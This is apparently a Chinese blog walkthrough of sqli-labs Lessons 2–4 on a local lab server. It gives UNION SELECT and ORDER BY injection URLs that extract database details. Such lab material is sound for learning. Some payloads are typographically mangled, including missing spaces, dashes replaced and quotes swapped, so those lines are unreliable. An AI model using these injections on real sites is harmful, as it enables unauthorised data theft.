提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
@TOC less 2 less 3 less 4
less 2—整型注入
less 3—单引号变形字符型注入
less 4—双引号字符型注入
判断注入点
判断列数
判断数据显示位置
判断数据显示位置
插入SQL语句查询更多信息
less 2—整型注入
http://localhost:7777/Less-2/?id=-1
查询得知没有闭合符
在查询其他信息的时候记住
id后面什么都不加进行相应的语句查询
判断注入点
判断列数
http://localhost:7777/Less-2/?id=1orderby 3—
由此我们可以确认列数为3(4报错)
判断数据显示位置(联合查询)
http://localhost:7777/Less-2/?id=-1 union select 1,2,3–+
插入SQL语句查询更多信息
http://localhost:7777/Less-2/?id=-1 union select 1,2,database()–+
与less1大致相同
less 3—单引号变形字符型注入
这就需要我们注入的时候闭合掉括号
判断注入点
http://localhost:7777/Less-3/?id=1
在查询其他信息的时候记住
id后面加上’)再添加相应的语句查询
less 4—双引号字符型注入
http://localhost:7777/Less-4/?id=1
在查询其他信息的时候记住
id后面加上’’)再添加相应的语句查询
其他不变